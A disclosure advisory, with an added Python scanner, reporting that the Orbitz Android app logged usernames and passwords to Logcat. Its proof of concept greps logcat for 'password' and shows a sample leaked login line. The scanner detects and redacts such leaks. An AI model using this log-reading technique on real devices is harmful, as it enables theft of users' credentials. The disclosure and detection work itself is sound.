
Security Bug in Orbitz Android App

friendlyjlee Sep 16th, 2019 (edited)
# Exploit Title: Orbitz Android App - Username/Password Logging
# Application: Orbitz
# Version: 19.31.1
# Software Link: https://play.google.com/store/apps/details?id=com.orbitz
# Company: Orbitz
# Installs: 1,000,000+
# Impact: By reading Logcat output, an attacker can obtain Orbitz usernames and passwords
# Category: Mobile Apps
# Tested on: Android 9

---Description---
Usernames and passwords are written to the log during authentication, so an attacker who can read Logcat can obtain an Orbitz user's ID and password simply by looking at it. This is especially serious on Android versions before Jelly Bean, where any installed app could read Logcat without requesting any permission.

---Vendor feedback---
After the report, the vendor quickly fixed the problem and released a new version.

---PoC---
1. Log in with the Orbitz app, entering a username and password.

2. Search Logcat for the password:
$ adb logcat | grep 'password'
08-06 18:31:28.036  6213  6294 D OkHttp  : email=myOrbizemail%40gmail.com&password=myOrbitPassword&staySignedIn=true&siteid=70201&langid=1033&sourceType=mobileapp&clientid=orbitz.app.android.phone%3A19.31.1
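
As an added defender-side example (not part of the original advisory), the check below turns the `grep 'password'` step into a structured scan of a logcat capture for app testing or CI: it parses threadtime-format lines, detects URL-encoded form bodies like the one above, and reports the sensitive field names with their values redacted. It assumes logcat's default threadtime layout; the sample lines are constructed, with the third one reproducing the advisory's PoC output.

```python
import re
from urllib.parse import parse_qsl

# Field names that must never reach a log, matched case-insensitively as substrings.
SENSITIVE_KEYS = ("password", "passwd", "pwd", "secret", "token", "email", "username")

# logcat "threadtime" layout: MM-DD HH:MM:SS.mmm  PID  TID LEVEL TAG : message
LOGCAT_RE = re.compile(
    r"^(?P<ts>\d{2}-\d{2} \d{2}:\d{2}:\d{2}\.\d{3})\s+(?P<pid>\d+)\s+(?P<tid>\d+)\s+"
    r"(?P<level>[VDIWEF])\s+(?P<tag>\S+)\s*:\s(?P<msg>.*)$"
)
# A URL-encoded form body: two or more key=value pairs joined by '&', no whitespace.
FORM_BODY_RE = re.compile(r"^[\w.%+-]+=[^&\s]*(?:&[\w.%+-]+=[^&\s]*)+$")

def redact(value: str) -> str:
    """Report only the length so the finding does not re-leak the credential."""
    return f"<redacted {len(value)} chars>"

def find_credential_leaks(lines):
    """Return one finding per sensitive form field found in a logcat line."""
    findings = []
    for line in lines:
        m = LOGCAT_RE.match(line)
        if not m or not FORM_BODY_RE.match(m.group("msg")):
            continue
        # parse_qsl URL-decodes values ('%40' -> '@'), so keys are compared on clean text.
        for key, value in parse_qsl(m.group("msg"), keep_blank_values=True):
            if any(s in key.lower() for s in SENSITIVE_KEYS):
                findings.append({
                    "pid": int(m.group("pid")), "tag": m.group("tag"),
                    "field": key, "value": redact(value),
                })
    return findings

# Constructed sample capture; the third line reproduces the advisory's PoC output.
SAMPLE_LOGCAT = [
    "08-06 18:31:27.900  6213  6294 D OkHttp  : --> POST https://api.example.invalid/login http/1.1",
    "08-06 18:31:27.901  6213  6294 D OkHttp  : Content-Type: application/x-www-form-urlencoded",
    "08-06 18:31:28.036  6213  6294 D OkHttp  : email=myOrbizemail%40gmail.com&password=myOrbitPassword"
    "&staySignedIn=true&siteid=70201&langid=1033&sourceType=mobileapp"
    "&clientid=orbitz.app.android.phone%3A19.31.1",
    "08-06 18:31:28.100  6213  6294 D OkHttp  : siteid=70201&langid=1033",
]

if __name__ == "__main__":
    for f in find_credential_leaks(SAMPLE_LOGCAT):
        print(f"pid {f['pid']} tag {f['tag']}: field '{f['field']}' logged as {f['value']}")
```

Pipe a real capture in with `adb logcat -v threadtime` to scan a device; the field list is where to add any app-specific credential names.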
---Reporter---
Jaeho Lee (Jaeho.Lee@rice.edu)
Rice Computer Security Lab
Rice University